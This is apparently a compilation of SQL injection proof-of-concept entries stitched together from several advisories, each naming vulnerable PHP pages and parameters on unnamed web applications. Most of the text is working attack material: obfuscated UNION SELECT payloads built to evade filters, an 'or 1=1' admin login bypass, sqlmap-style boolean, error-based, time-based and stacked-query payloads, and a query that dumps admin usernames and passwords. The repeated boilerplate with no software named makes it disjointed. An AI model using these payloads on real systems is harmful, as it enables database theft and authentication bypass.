The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/viewprofile.php?profid=[SQL]
http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
-263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
http://localhost/[PATH]/admin with Email: 'or 1=1 or ''=' Pass: anything.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/admin/members_view.php?id=[SQL]
2271+aND(/*!00033SelEcT*/+0x30783331+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+1=1
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=2271 RLIKE (SELECT (CASE WHEN (8371=8371) THEN 2271 ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2271 AND (SELECT 9357 FROM(SELECT COUNT(*),CONCAT(0x7176716a71,(SELECT (ELT(9357=9357,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: id=2271;SELECT SLEEP(5)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=2271 OR SLEEP(5)
The vulnerability allows an attacker to inject SQL commands. An attacker can bypass authentication by sending a crafted request with 'or 1=1 or ''=' as the username and anything as the password.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/add_to_cart.php?product_id=[SQL]
Parameter: product_id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: product_id=3 AND SLEEP(5)
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL]
-1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+-
Parameter: groupid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: groupid=1 AND 3188=3188
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: groupid=1 AND SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM
The vulnerability allows an attacker to inject SQL commands by manipulating the 'username' parameter of the 'login' form.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=95&action=edit&id=3 AND SLEEP(5)
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/?photo=[SQL]
Parameter: photo (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs
The vulnerability allows an attacker to inject SQL commands. An example of a payload is ' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM'